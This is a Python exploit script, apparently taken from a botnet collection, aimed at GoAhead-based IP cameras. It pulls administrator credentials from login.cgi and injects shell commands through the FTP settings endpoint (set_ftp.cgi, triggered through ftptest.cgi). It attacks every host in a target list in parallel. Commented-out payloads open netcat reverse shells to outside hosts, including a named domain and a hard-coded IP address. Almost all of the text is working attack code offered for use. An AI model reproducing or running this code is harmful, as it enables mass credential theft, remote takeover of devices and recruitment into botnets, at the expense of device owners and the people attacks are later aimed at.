Path: blob/master/Botnets/Exploits/R4IX/[_python_]_r4ix_3.py
5038 views
import socket1import sys2import re3import time4from multiprocessing import Process56def retrieve_credentials(host, port):7sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)8try:9sock.settimeout(5)10sock.connect((host, int(port)))11except:12sock.close()13return 014# Retrieved credentials15try:16sock.send("GET login.cgi HTTP/1.0\n\n")17resp = sock.recv(1024)18# Double receive19resp += sock.recv(1024)20except:21sock.close()22return 023if not resp:24sock.close()25return 026index = resp.find("var login")27done = resp[index:]28m = done.strip("\r\n")29l = m.split(" ")30if len(l) <= 1:31sock.close()32return 033try:34preuser = l[1].strip("var \r\n")35prepass = l[2].strip("var \r\n")36except:37return 038username = preuser[11:].strip('";')39password = prepass[11:].strip('";')40sock.close()41return username + ":" + password4243def submit_payload(host, port, payload):44sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)45try:46sock.settimeout(5)47sock.connect((host, int(port)))48except:49sock.close()50return 051try:52sock.send(payload)53except:54sock.close()55return 056sock.close()57return 15859def submit_payload2(host, port, payload):60sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)61try:62sock.settimeout(5)63sock.connect((host, int(port)))64except:65sock.close()66return 067try:68sock.send(payload)69except:70sock.close()71return 072now = time.clock()73while (time.clock() - now) < 30:74try:75resp = sock.recv(1024)76except:77break78if not resp:79break80if "ok" in resp:81sock.close()82return 183sock.close()84return 08586def run(host, port):87ret = retrieve_credentials(host, port)88if ret == 0:89return90str = ret.split(":")91username = str[0]92password = str[1]93if username != "" and password != "":94print "Retrieved credentials %s:%s" % (str[0], str[1])95else:96return97# Continue assuming we've retrieved the credentials successfully98#payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"99for i in open("file", "r").readlines():100line = i.strip("\r\n")101payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"102ret = submit_payload(host, port, payload)103if ret == 0:104print "failed to send payload - %s (timeout?)" % (host)105return106payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)107ret = submit_payload2(host, port, payload2)108if ret == 0:109print "failed to send payload - %s (timeout?)" % (host)110return111"""payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"112ret = submit_payload(host, port, payload)113if ret == 0:114print "Failed to send initial payload"115return116print "Sent initial payload, building & preparing to send the second"117payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)118ret = submit_payload2(host, port, payload2)119if ret == 0:120print "Failed to send submit payload"121return"""122123if __name__ == "__main__":124for i in open("goahead", "r").readlines():125line = i.strip("\r\n")126info = line.split(":")127ip = info[0]128port = 81129p = Process(target=run, args=(ip,port,))130p.start()131132